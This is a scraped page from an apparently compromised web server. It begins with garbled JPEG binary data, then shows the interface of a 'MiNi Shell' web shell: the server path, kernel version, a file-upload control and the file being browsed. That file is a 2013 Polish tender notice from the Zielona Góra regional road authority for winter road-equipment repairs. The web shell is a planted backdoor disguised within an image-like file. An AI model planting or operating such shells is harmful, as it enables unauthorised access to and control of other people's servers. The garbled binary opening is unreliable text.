JFIF ( %!1!%)+...383-7(-.+  -% &5/------------------------------------------------";!1AQ"aq2#3BRrb*!1"AQa2q#B ?yRd&vGlJwZvK)YrxB#j]ZAT^dpt{[wkWSԋ*QayBbm*&0<|0pfŷM`̬ ^.qR𽬷^EYTFíw<-.j)M-/s yqT'&FKz-([lև<G$wm2*e Z(Y-FVen櫧lҠDwүH4FX1 VsIOqSBۡNzJKzJξcX%vZcFSuMٖ%B ִ##\[%yYꉅ !VĂ1َRI-NsZJLTAPמQ:y״g_g= m֯Ye+Hyje!EcݸࢮSo{׬*h g<@KI$W+W'_> lUs1,o*ʺE.U"N&CTu7_0VyH,q ,)H㲣5<t ;rhnz%ݓz+4 i۸)P6+F>0Tв`&i}Shn?ik܀՟ȧ@mUSLFηh_er i_qt]MYhq 9LaJpPןߘvꀡ\"z[VƬ¤*aZMo=WkpSp \QhMb˒YH=ܒ m`CJt 8oFp]>pP1F>n8(*aڈ.Y݉[iTع JM!x]ԶaJSWҼܩ`yQ`*kE#nNkZKwA_7~ ΁JЍ;-2qRxYk=Uր>Z qThv@.w c{#&@#l;D$kGGvz/7[P+i3nIl`nrbmQi%}rAVPT*SF`{'6RX46PԮp(3W҅U\a*77lq^rT$vs2MU %*ŧ+\uQXVH !4t*Hg"Z챮 JX+RVU+ތ]PiJT XI= iPO=Ia3[ uؙ&2Z@.*SZ (")s8Y/-Fh Oc=@HRlPYp!wr?-dugNLpB1yWHyoP\ѕрiHִ,ِ0aUL.Yy`LSۜ,HZz!JQiVMb{( tژ <)^Qi_`: }8ٱ9_.)a[kSr> ;wWU#M^#ivT܎liH1Qm`cU+!2ɒIX%ֳNړ;ZI$?b$(9f2ZKe㼭qU8I[ U)9!mh1^N0 f_;׆2HFF'4b! yBGH_jтp'?uibQ T#ѬSX5gޒSF64ScjwU`xI]sAM( 5ATH_+s 0^IB++h@_Yjsp0{U@G -:*} TނMH*֔2Q:o@ w5(߰ua+a ~w[3W(дPYrF1E)3XTmIFqT~z*Is*清Wɴa0Qj%{T.ޅ״cz6u6݁h;֦ 8d97ݴ+ޕxзsȁ&LIJT)R0}f }PJdp`_p)əg(ŕtZ 'ϸqU74iZ{=Mhd$L|*UUn &ͶpHYJۋj /@9X?NlܾHYxnuXږAƞ8j ໲݀pQ4;*3iMlZ6w ȵP Shr!ݔDT7/ҡϲigD>jKAX3jv+ ߧز #_=zTm¦>}Tց<|ag{E*ֳ%5zW.Hh~a%j"e4i=vױi8RzM75i֟fEu64\էeo00d H韧rȪz2eulH$tQ>eO$@B /?=#٤ǕPS/·.iP28s4vOuz3zT& >Z2[0+[#Fޑ]!((!>s`rje('|,),y@\pЖE??u˹yWV%8mJ iw:u=-2dTSuGL+m<*צ1as&5su\phƃ qYLֳ>Y(PKi;Uڕp ..!i,54$IUEGLXrUE6m UJC?%4AT]I]F>׹P9+ee"Aid!Wk|tDv/ODc/,o]i"HIHQ_n spv"b}}&I:pȟU-_)Ux$l:fژɕ(I,oxin8*G>ÌKG}Rڀ8Frajٷh !*za]lx%EVRGYZoWѮ昀BXr{[d,t Eq ]lj+ N})0B,e iqT{z+O B2eB89Cڃ9YkZySi@/(W)d^Ufji0cH!hm-wB7C۔֛X$Zo)EF3VZqm)!wUxM49< 3Y .qDfzm |&T"} {*ih&266U9* <_# 7Meiu^h--ZtLSb)DVZH*#5UiVP+aSRIª!p挤c5g#zt@ypH={ {#0d N)qWT kA<Ÿ)/RT8D14y b2^OW,&Bcc[iViVdִCJ'hRh( 1K4#V`pِTw<1{)XPr9Rc 4)Srgto\Yτ~ xd"jO:A!7􋈒+E0%{M'T^`r=E*L7Q]A{]A<5ˋ.}<9_K (QL9FЍsĮC9!rpi T0q!H \@ܩB>F6 4ۺ6΋04ϲ^#>/@tyB]*ĸp6&<џDP9ᗟatM'> b쪗wI!܁V^tN!6=FD܆9*? q6h8  {%WoHoN.l^}"1+uJ ;r& / IɓKH*ǹP-J3+9 25w5IdcWg0n}U@2 #0iv腳z/^ƃOR}IvV2j(tB1){S"B\ ih.IXbƶ:GnI F.^a?>~!k''T[ע93fHlNDH;;sg-@, JOs~Ss^H '"#t=^@'W~Ap'oTڭ{Fن̴1#'c>꜡?F颅B L,2~ת-s2`aHQm:F^j&~*Nūv+{sk$F~ؒ'#kNsٗ D9PqhhkctԷFIo4M=SgIu`F=#}Zi'cu!}+CZI7NuŤIe1XT xC۷hcc7 l?ziY䠩7:E>k0Vxypm?kKNGCΒœap{=i1<6=IOV#WY=SXCޢfxl4[Qe1 hX+^I< tzǟ;jA%n=q@j'JT|na$~BU9؂dzu)m%glwnXL`޹W`AH̸뢙gEu[,'%1pf?tJ Ζmc[\ZyJvn$Hl'<+5[b]v efsЁ ^. &2 yO/8+$ x+zs˧Cޘ'^e fA+ڭsOnĜz,FU%HU&h fGRN擥{N$k}92k`Gn8<ʮsdH01>b{ {+ [k_F@KpkqV~sdy%ϦwK`D!N}N#)x9nw@7y4*\ Η$sR\xts30`O<0m~%U˓5_m ôªs::kB֫.tpv쌷\R)3Vq>ٝj'r-(du @9s5`;iaqoErY${i .Z(Џs^!yCϾ˓JoKbQU{௫e.-r|XWլYkZe0AGluIɦvd7 q -jEfۭt4q +]td_+%A"zM2xlqnVdfU^QaDI?+Vi\ϙLG9r>Y {eHUqp )=sYkt,s1!r,l鄛u#I$-֐2A=A\J]&gXƛ<ns_Q(8˗#)4qY~$'3"'UYcIv s.KO!{, ($LI rDuL_߰ Ci't{2L;\ߵ7@HK.Z)4
Devil Killer Is Here MiNi Shell

MiNi SheLL

Current Path : /home/vmanager/www/common/web/tenders/20130625/

Linux 9dbcd5f6333d 5.15.0-124-generic #134-Ubuntu SMP Fri Sep 27 20:20:17 UTC 2024 x86_64
Upload File :
Current File : /home/vmanager/www/common/web/tenders/20130625/123969-N-2013.html

<p class="kh_header"><b>Zielona Góra: Usługi w zakresie naprawy i konserwacji sprzętu do zimowego utrzymania dróg w sezonie 2013/2014 będącego w posiadaniu Zarządu Dróg Wojewódzkich w Zielonej Górze:
Zadanie nr 1 - Rejon Dróg Wojewódzkich w Kożuchowie
Zadanie nr 2 - Rejon Dróg Wojewódzkich w Zielonej Górze</b><br>
<b>Numer ogłoszenia: 123969 - 2013; data zamieszczenia: 25.06.2013</b><br>
OGŁOSZENIE O ZAMÓWIENIU - usługi<br><br></p>

<p><b>Zamieszczanie ogłoszenia:</b> obowiązkowe.</p>
<p><b>Ogłoszenie dotyczy:</b> zamówienia publicznego.</p>

<p class="kh_title">SEKCJA I: ZAMAWIAJĄCY</p>

<p><b>I. 1) NAZWA I ADRES:</b> Zarząd Dróg Wojewódzkich w Zielonej Górze , Al. Niepodległości 32, 65-042 Zielona Góra, woj. lubuskie, tel. 068 3280300, faks 068 3280332.</p>
<ul class="kh_indent_1">
<li><b>Adres strony internetowej zamawiającego:</b> www.zdw.zgora.pl</li></ul>
<p><b>I. 2) RODZAJ ZAMAWIAJĄCEGO:</b> Administracja samorządowa.</p>

<p class="kh_title">SEKCJA II: PRZEDMIOT ZAMÓWIENIA</p>

<p><b>II.1) OKREŚLENIE PRZEDMIOTU ZAMÓWIENIA</b></p>
<p><b>II.1.1) Nazwa nadana zamówieniu przez zamawiającego:</b> Usługi w zakresie naprawy i konserwacji sprzętu do zimowego utrzymania dróg w sezonie 2013/2014 będącego w posiadaniu Zarządu Dróg Wojewódzkich w Zielonej Górze:
Zadanie nr 1 - Rejon Dróg Wojewódzkich w Kożuchowie
Zadanie nr 2 - Rejon Dróg Wojewódzkich w Zielonej Górze.</p>
<p><b>II.1.2) Rodzaj zamówienia:</b> usługi.</p>
<p><b>II.1.4) Określenie przedmiotu oraz wielkości lub zakresu zamówienia:</b> DOTYCZY ZADANIA NR 1: Rejon Dróg Wojewódzkich w Kożuchowie

1.Zamówienie obejmuje:    

1.	Przeglądy okresowe (na pisemne zlecenie zamawiającego)
2.	Naprawy: 
               - wynikające z przeglądów, 
               - awaryjne - w trakcie sezonu zimowego,
                           - blacharskie, spawalnicze, lakierniczo-malarskie

2.Wykonawca w ciągu 7 dni kalendarzowych od podpisania umowy przekaże Zamawiającemu dane osoby, bądź osób zawierające imię  i nazwisko oraz numer telefonu /fax/ służący do powiadamiania o zaistnieniu awarii .

3.Przeglądy okresowe i naprawy będą wykonywane (na pisemne zlecenie Zamawiającego)  u Zamawiającego w Bazach  Obwodów Drogowych podległych RDW w  terminie do 15 października 2013r.

4.Naprawy awaryjne ekipa serwisowa Wykonawcy zobowiązana jest wykonać w ciągu 24 godzin od przyjęcia zgłoszenia awarii. Ekipa serwisowa Wykonawcy w chwili stawienia się w miejscu awarii powinna dysponować odpowiednimi środkami niezbędnymi do jak najszybszego przywrócenia urządzenia do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. W przypadku nie wykonania naprawy w ciągu 24 godz. od powiadomienia Wykonawca jest zobowiązany podstawić i zamontować sprzęt zastępczy umożliwiający Zamawiającemu prowadzenie prac związanych z zimowym utrzymaniem dróg. Transport oraz montaż / demontaż maszyny po stronie Wykonawcy.

5.Niewykonanie naprawy w ciągu 24 godz. od powiadomienia i nie podstawienie sprzętu
    zastępczego skutkować będzie zastosowaniem kar umownych określonych w 
    umowie.

6.Wykonawca powinien zapewnić możliwość zgłoszenia przez Zamawiającego faktu zaistnienia awarii
 w okresie trwania umowy, siedem dni w tygodniu przez 24 godziny na dobę. Dotyczy to również  
  wszystkich dni ustawowo wolnych od pracy.

7. Wykonawca usług będzie stosował części zamienne akceptowane przez producenta sprzętu.

8.Wykonawca powinien dysponować odpowiednim zapleczem technicznym jak również wykwalifikowaną kadrą umożliwiającą sprawne przeprowadzenie naprawy w warunkach zimowych.

Szczegółowy opis przedmiotu zamówienia oraz wymagania techniczne określone zostały w Rozdziale III SIWZ.



DOTYCZY ZADANIA NR 2: Rejon Dróg Wojewódzkich w Zielonej Górze

1.Zamówienie obejmuje:    

1.	Przeglądy 
2.	Naprawy: 
       - wynikające z przeglądów, 
        - awaryjne - w trakcie sezonu zimowego,
                    - blacharskie, spawalnicze, lakierniczo-malarskie

2.Wykonawca niezwłocznie po podpisaniu umowy przekaże Zamawiającemu dane osoby, bądź osób zawierające imię  i nazwisko oraz numer telefonu /fax/ służący do powiadamiania   o zaistnieniu awarii.  

3.Przeglądy i  naprawy będą wykonywane u Zamawiającego w Bazach  Obwodów Drogowych podległych RDW w  terminie do 15 października 2013r.

4.Naprawy awaryjne ekipa serwisowa Wykonawcy zobowiązana jest wykonać w ciągu 48 godzin od przyjęcia zgłoszenia awarii. Ekipa serwisowa Wykonawcy w chwili stawienia się  w miejscu awarii powinna dysponować odpowiednimi środkami niezbędnymi do jak najszybszego przywrócenia urządzenia do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. W przypadku zaistnienia poważnej usterki uniemożliwiającej naprawę po przyjeździe ekipy serwisowej, Wykonawca ma obowiązek  w ciągu kolejnych 24 godzin  przywrócić  urządzenie do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. 

5.Wykonawca powinien zapewnić możliwość zgłoszenia przez Zamawiającego faktu zaistnienia awarii w okresie trwania umowy, siedem dni w tygodniu przez 24 godziny na dobę Dotyczy to również wszystkich dni ustawowo wolnych od pracy.

6.Wykonawca usług będzie stosował części zamienne akceptowane przez producenta sprzętu.

7.Wykonawca powinien dysponować odpowiednim zapleczem technicznym jak również wykwalifikowaną kadrą umożliwiającą sprawne przeprowadzenie naprawy w warunkach zimowych.


Szczegółowy opis przedmiotu zamówienia oraz wymagania techniczne określone zostały w Rozdziale III SIWZ..</p>
<p><b>II.1.5) przewiduje się udzielenie zamówień uzupełniających:</b></p>
<ul class="kh_indent_1"><li><b>Określenie przedmiotu oraz wielkości lub zakresu zamówień uzupełniających</b></li><li>Zamawiający przewiduje zamówienia uzupełniające, o których mowa w art. 67 ust.1 pkt 6 ustawy Prawo zamówień publicznych, stanowiące nie więcej niż 30% wartości zamówienia podstawowego</li></ul>

<p><b>II.1.6) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.11.00.00-9.</p>
<p><b>II.1.7) Czy dopuszcza się złożenie oferty częściowej:</b> tak, liczba części: 2.</p>
<p><b>II.1.8) Czy dopuszcza się złożenie oferty wariantowej:</b> nie.</p><br>
<p><b>II.2) CZAS TRWANIA ZAMÓWIENIA LUB TERMIN WYKONANIA:</b> Zakończenie: 31.05.2014.</p>
<p class="kh_title">SEKCJA III: INFORMACJE O CHARAKTERZE PRAWNYM, EKONOMICZNYM, FINANSOWYM I TECHNICZNYM</p>

<p><b>III.1) WADIUM</b></p>
<p><b>Informacja na temat wadium:</b> Nie dotyczy</p>
<p><b>III.2) ZALICZKI</b></p>
<p><b>III.3) WARUNKI UDZIAŁU W POSTĘPOWANIU ORAZ OPIS SPOSOBU DOKONYWANIA OCENY SPEŁNIANIA TYCH WARUNKÓW</b></p>
<ul class="kh_indent_1">
<li><p><b>III.3.2) Wiedza i doświadczenie</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą wykonane, a w przypadku świadczeń okresowych lub ciągłych również wykonywane, główne usługi* w okresie ostatnich trzech lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów na rzecz których usługi zostały wykonane oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;

*) przez główne usługi zamawiający rozumie wykonanie 1 usługi w zakresie naprawy i konserwacji sprzętu do zimowego utrzymania dróg o wartości:

Zadanie nr 1 - nie mniejszej niż 120.000,00 zł  brutto 
Zadanie nr 2 - nie mniejszej niż 90.000,00 zł brutto

Nie dopuszcza się sumowania usług celem uzyskania wymaganej minimalnej wartości.
W przypadku składania oferty przez podmioty występujące wspólnie warunek musi być spełniony przynajmniej przez jeden z podmiotów.</p>
</li></ul></li><li><p><b>III.3.4) Osoby zdolne do wykonania zamówienia</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>wykażą osoby, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług wraz z informacjami na temat ich kwalifikacji zawodowych,  doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami, tj.:
      
  - osobę odpowiedzialną za realizację zamówienia</p>
</li></ul></li><li><p><b>III.3.5) Sytuacja ekonomiczna i finansowa</b></p>
<p><b>Opis sposobu dokonywania oceny spełniania tego warunku</b></p>
<ul class="kh_indent_1"><li><p>przedłożą opłaconą polisę, a przypadku jej braku inny dokument potwierdzający, że wykonawca  jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia o wartości ubezpieczenia na kwotę nie mniejszą niż :
Zadanie nr 1 : 120.000,00 zł 
Zadanie nr 2: 90.000,00 zł
wraz z załączeniem kopii dowodu opłaty polisy, względnie poszczególnych rat.

W przypadku składania oferty przez podmioty występujące wspólnie warunek może być spełniony łącznie.</p>
</li></ul></li></ul>
<p><b>III.4) INFORMACJA O OŚWIADCZENIACH LUB DOKUMENTACH, JAKIE MAJĄ DOSTARCZYĆ WYKONAWCY W CELU POTWIERDZENIA SPEŁNIANIA WARUNKÓW UDZIAŁU W POSTĘPOWANIU ORAZ NIEPODLEGANIA WYKLUCZENIU NA PODSTAWIE ART. 24 UST. 1 USTAWY</b></p>
<p><b>III.4.1) W zakresie wykazania spełniania przez wykonawcę warunków, o których mowa w art. 22 ust. 1 ustawy, oprócz oświadczenia o spełnianiu warunków udziału w postępowaniu należy przedłożyć:</b></p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li  style="margin-bottom: 12px;">wykaz wykonanych, a w przypadku świadczeń okresowych lub ciągłych również wykonywanych, głównych dostaw lub usług, w okresie ostatnich trzech lat przed upływem terminu składania ofert albo wniosków o dopuszczenie do udziału w postępowaniu, a jeżeli okres prowadzenia działalności jest krótszy - w tym okresie, wraz z podaniem ich wartości, przedmiotu, dat wykonania i podmiotów, na rzecz których dostawy lub usługi zostały wykonane, oraz załączeniem dowodów, czy zostały wykonane lub są wykonywane należycie;</li>

<li  style="margin-bottom: 12px;">wykaz osób, które będą uczestniczyć w wykonywaniu zamówienia, w szczególności odpowiedzialnych za świadczenie usług, kontrolę jakości lub kierowanie robotami budowlanymi, wraz z informacjami na temat ich kwalifikacji zawodowych, doświadczenia i wykształcenia niezbędnych do wykonania zamówienia, a także zakresu wykonywanych przez nie czynności, oraz informacją o podstawie do dysponowania tymi osobami;</li>

<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że wykonawca jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia.</li>

</ul><p>Wykonawca powołujący się przy wykazywaniu spełnienia warunków udziału w postępowaniu, o których mowa w art. 22 ust. 1 pkt 4 ustawy, na zasoby innych podmiotów przedkłada następujące dokumenty dotyczące podmiotów, zasobami których będzie dysponował wykonawca:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
			
<li  style="margin-bottom: 12px;">opłaconą polisę, a w przypadku jej braku, inny dokument potwierdzający, że inny podmiot jest ubezpieczony od odpowiedzialności cywilnej w zakresie prowadzonej działalności związanej z przedmiotem zamówienia;</li>

</ul>
<p><b>III.4.2) W zakresie potwierdzenia niepodlegania wykluczeniu na podstawie art. 24 ust. 1 ustawy, należy przedłożyć:</b></p>

<ul style="text-align: justify; margin-right: 20px; list-style: disc"><li style="margin-bottom: 12px;">oświadczenie o braku podstaw do wykluczenia;</li>

<li style="margin-bottom: 12px;">aktualny odpis z właściwego rejestru lub z centralnej ewidencji i informacji o działalności gospodarczej, jeżeli odrębne przepisy wymagają wpisu do rejestru lub ewidencji, w celu wykazania braku podstaw do wykluczenia w oparciu o art. 24 ust. 1 pkt 2 ustawy, wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul>

<p class="bold">III.4.3) Dokumenty podmiotów zagranicznych</p>
<p class="bold">Jeżeli wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, przedkłada:</p>
<p class="bold">III.4.3.1)  dokument wystawiony w kraju, w którym ma siedzibę lub miejsce zamieszkania potwierdzający, że:</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">
<li style="margin-bottom: 12px;">nie otwarto jego likwidacji ani nie ogłoszono upadłości - wystawiony nie wcześniej niż 6 miesięcy przed upływem terminu składania wniosków o dopuszczenie do udziału w postępowaniu o udzielenie zamówienia albo składania ofert;</li>

</ul><p class="bold">III.4.4)  Dokumenty dotyczące przynależności do tej samej grupy kapitałowej</p>
<ul style="text-align: justify; margin-right: 20px; list-style: disc;">			
<li style="margin-bottom: 12px;">lista podmiotów należących do tej samej grupy kapitałowej w rozumieniu ustawy z dnia 16 lutego 2007 r. o ochronie konkurencji i konsumentów albo informacji o tym, że nie należy do grupy kapitałowej;</li>

</ul><p><b>III.6) INNE DOKUMENTY</b></p>
<p class="bold">Inne dokumenty niewymienione w pkt III.4) albo w pkt III.5)</p>
<p>Formularz oferty (Rozdział II);
Wypełnić druk Formularz oferty. Ofertę należy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego;

Oświadczenie o spełnieniu warunków określonych w art. 22 ust.1 ustawy (zał. nr 1)- ORYGINAŁ DOKUMENTU;

Wykaz prac, które wykonawca powierzy podwykonawcom (zał. nr 4);

Wypełniony formularz cenowy (Rozdział IV);
Wypełnić kosztorys ofertowy / formularz cenowy. Kosztorys ofertowy sporządzić ściśle wg wzoru druku załączonego przez zamawiającego. Sporządzenie kosztorysu w innej formie spowoduje odrzucenie oferty.

Listę podmiotów należących do tej samej grupy kapitałowej, o której mowa w art. 24 ust. 2 pkt 5, albo informację o tym, że wykonawca nie należy do grupy kapitałowej (zał. nr 5).

Ofertę należy sporządzić ściśle wg wzoru druków załączonych przez zamawiającego</p>

<p class="kh_title">SEKCJA IV: PROCEDURA</p>
<p><b>IV.1) TRYB UDZIELENIA ZAMÓWIENIA</b></p>
<p><b>IV.1.1) Tryb udzielenia zamówienia:</b> przetarg nieograniczony.</p>

<p><b>IV.2) KRYTERIA OCENY OFERT</b></p>
<p><b>IV.2.1) Kryteria oceny ofert: </b>najniższa cena.</p>
<p><b>IV.3) ZMIANA UMOWY</b></p>
<p><b>przewiduje się istotne zmiany postanowień zawartej umowy w stosunku do treści oferty, na podstawie której dokonano wyboru wykonawcy: </b></p>
<p><b>Dopuszczalne zmiany postanowień umowy oraz określenie warunków zmian</b></p>
<p>ZADANIE NR 1:
Zamawiający dopuszcza zmiany postanowień zawartej umowy w następujących przypadkach:
a) Zmiana terminu realizacji przedmiotu umowy w sytuacji:
wystąpienia wydarzeń lub okoliczności uniemożliwiających wykonanie robót bądź w znaczny sposób je spowalniający tj.: niesprzyjające warunki atmosferyczne (długotrwałe opady deszczu, śnieg, mróz, porywiste wiatry), klęski żywiołowe (powódź, huragan, trzęsienie ziemi), niepokoje lub strajk spowodowany przez osoby inne niż personel Wykonawcy;
b) Zmiany osobowe:
zmiana osób, przy pomocy których Wykonawca lub Zamawiający realizuje przedmiot umowy, a od których wymagano określonego doświadczenia lub wykształcenia na inne legitymujące się doświadczeniem lub wykształceniem spełniającym wymóg SIWZ.
c) Pozostałe okoliczności powodujące możliwość zmiany umowy:
siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
zmiana obowiązującej stawki VAT;
zmiana wynagrodzenia w przypadku zmniejszenia zakresu przedmiotowego niniejszej umowy
zmiana podwykonawców
zmiana zakresu usług realizowana przez podwykonawców
zmiany regulacji prawnych obowiązujących po dniu zawarcia umowy
zmiany teleadresowe Stron umowy określonych w umowie. 

ZADANIE NR 2:
Zamawiający dopuszcza zmiany postanowień zawartej umowy w następujących przypadkach:
a) Zmiana terminu realizacji przedmiotu umowy w sytuacji:
wystąpienia wydarzeń lub okoliczności uniemożliwiających wykonanie robót bądź w znaczny sposób je spowalniający tj.: niesprzyjające warunki atmosferyczne (długotrwałe opady deszczu, śnieg, mróz, porywiste wiatry), klęski żywiołowe (powódź, huragan, trzęsienie ziemi), niepokoje lub strajk spowodowany przez osoby inne niż personel Wykonawcy;
b) Zmiany osobowe:
zmiana osób, przy pomocy których Wykonawca lub Zamawiający realizuje przedmiot umowy, 
c) Pozostałe okoliczności powodujące możliwość zmiany umowy:
siła wyższa uniemożliwiająca wykonanie przedmiotu umowy zgodnie z SIWZ;
zmiana obowiązującej stawki VAT;
zmiana wynagrodzenia w przypadku zmniejszenia zakresu przedmiotowego niniejszej umowy
zmiana podwykonawców
zmiana zakresu usług realizowana przez podwykonawców
zmiany regulacji prawnych obowiązujących po dniu zawarcia umowy.</p>
<p><b>IV.4) INFORMACJE ADMINISTRACYJNE</b></p>
<p><b>IV.4.1)</b>&nbsp;<b>Adres strony internetowej, na której jest dostępna specyfikacja istotnych warunków zamówienia:</b> www.bip.zdw.zgora.pl (bezpłatne)<br>
<b>Specyfikację istotnych warunków zamówienia można uzyskać pod adresem:</b> siedziba zamawiającego
- zaplata w kasie 20 zł lub po jej uprzedniej wpłacie na konto zamawiającego nr 76 8363 0004 0006 6556 2000 0002..</p>
<p><b>IV.4.4) Termin składania wniosków o dopuszczenie do udziału w postępowaniu lub ofert:</b> 03.07.2013 godzina 10:00, miejsce: siedziba zamawiajacego, pokój nr 5.</p>
<p><b>IV.4.5) Termin związania ofertą:</b> okres w dniach: 30 (od ostatecznego terminu składania ofert).</p>





<p><b>IV.4.17) Czy przewiduje się unieważnienie postępowania o udzielenie zamówienia, w przypadku nieprzyznania środków pochodzących z budżetu Unii Europejskiej oraz niepodlegających zwrotowi środków z pomocy udzielonej przez państwa członkowskie Europejskiego Porozumienia o Wolnym Handlu (EFTA), które miały być przeznaczone na sfinansowanie całości lub części zamówienia: </b> nie</p>
<p class="text kh_title">ZAŁĄCZNIK I - INFORMACJE DOTYCZĄCE OFERT CZĘŚCIOWYCH</p>
<p><b>CZĘŚĆ Nr:</b> 1 <b>NAZWA:</b> Zadanie nr 1 - Rejon Dróg Wojewódzkich w Kożuchowie.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zamówienie obejmuje:    

1.	Przeglądy okresowe (na pisemne zlecenie zamawiającego)
2.	Naprawy: 
               - wynikające z przeglądów, 
               - awaryjne - w trakcie sezonu zimowego,
                           - blacharskie, spawalnicze, lakierniczo-malarskie

2.Wykonawca w ciągu 7 dni kalendarzowych od podpisania umowy przekaże Zamawiającemu dane osoby, bądź osób zawierające imię  i nazwisko oraz numer telefonu /fax/ służący do powiadamiania o zaistnieniu awarii .

3.Przeglądy okresowe i naprawy będą wykonywane (na pisemne zlecenie Zamawiającego)  u Zamawiającego w Bazach  Obwodów Drogowych podległych RDW w  terminie do 15 października 2013r.

4.Naprawy awaryjne ekipa serwisowa Wykonawcy zobowiązana jest wykonać w ciągu 24 godzin od przyjęcia zgłoszenia awarii. Ekipa serwisowa Wykonawcy w chwili stawienia się w miejscu awarii powinna dysponować odpowiednimi środkami niezbędnymi do jak najszybszego przywrócenia urządzenia do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. W przypadku nie wykonania naprawy w ciągu 24 godz. od powiadomienia Wykonawca jest zobowiązany podstawić i zamontować sprzęt zastępczy umożliwiający Zamawiającemu prowadzenie prac związanych z zimowym utrzymaniem dróg. Transport oraz montaż / demontaż maszyny po stronie Wykonawcy.

5.Niewykonanie naprawy w ciągu 24 godz. od powiadomienia i nie podstawienie sprzętu
    zastępczego skutkować będzie zastosowaniem kar umownych określonych w 
    umowie.

6.Wykonawca powinien zapewnić możliwość zgłoszenia przez Zamawiającego faktu zaistnienia awarii
 w okresie trwania umowy, siedem dni w tygodniu przez 24 godziny na dobę. Dotyczy to również  
  wszystkich dni ustawowo wolnych od pracy.

7. Wykonawca usług będzie stosował części zamienne akceptowane przez producenta sprzętu.

8.Wykonawca powinien dysponować odpowiednim zapleczem technicznym jak również wykwalifikowaną kadrą umożliwiającą sprawne przeprowadzenie naprawy w warunkach zimowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.11.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>
<p><b>CZĘŚĆ Nr:</b> 2 <b>NAZWA:</b> Zadanie nr 2 - Rejon Dróg Wojewódzkich w Zielonej Górze.</p>
<ul class="kh_indent_1"><li><p><b>1) Krótki opis ze wskazaniem wielkości lub zakresu zamówienia:</b> 1.Zamówienie obejmuje:    

1.	Przeglądy 
2.	Naprawy: 
       - wynikające z przeglądów, 
        - awaryjne - w trakcie sezonu zimowego,
                    - blacharskie, spawalnicze, lakierniczo-malarskie

2.Wykonawca niezwłocznie po podpisaniu umowy przekaże Zamawiającemu dane osoby, bądź osób zawierające imię  i nazwisko oraz numer telefonu /fax/ służący do powiadamiania   o zaistnieniu awarii.  

3.Przeglądy i  naprawy będą wykonywane u Zamawiającego w Bazach  Obwodów Drogowych podległych RDW w  terminie do 15 października 2013r.

4.Naprawy awaryjne ekipa serwisowa Wykonawcy zobowiązana jest wykonać w ciągu 48 godzin od przyjęcia zgłoszenia awarii. Ekipa serwisowa Wykonawcy w chwili stawienia się  w miejscu awarii powinna dysponować odpowiednimi środkami niezbędnymi do jak najszybszego przywrócenia urządzenia do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. W przypadku zaistnienia poważnej usterki uniemożliwiającej naprawę po przyjeździe ekipy serwisowej, Wykonawca ma obowiązek  w ciągu kolejnych 24 godzin  przywrócić  urządzenie do stanu umożliwiającego dalsze prowadzenie prac związanych z zimowym utrzymaniem dróg. 

5.Wykonawca powinien zapewnić możliwość zgłoszenia przez Zamawiającego faktu zaistnienia awarii w okresie trwania umowy, siedem dni w tygodniu przez 24 godziny na dobę Dotyczy to również wszystkich dni ustawowo wolnych od pracy.

6.Wykonawca usług będzie stosował części zamienne akceptowane przez producenta sprzętu.

7.Wykonawca powinien dysponować odpowiednim zapleczem technicznym jak również wykwalifikowaną kadrą umożliwiającą sprawne przeprowadzenie naprawy w warunkach zimowych..</p></li>
<li><p><b>2) Wspólny Słownik Zamówień (CPV):</b> 50.00.00.00-5, 50.11.00.00-9.</p></li>
<li><b>3) Czas trwania lub termin wykonania:</b> Zakończenie: 31.05.2014.</li><li><p><b>4) Kryteria oceny ofert: </b>najniższa cena. </ul><br>

Creat By MiNi SheLL
Email: jattceo@gmail.com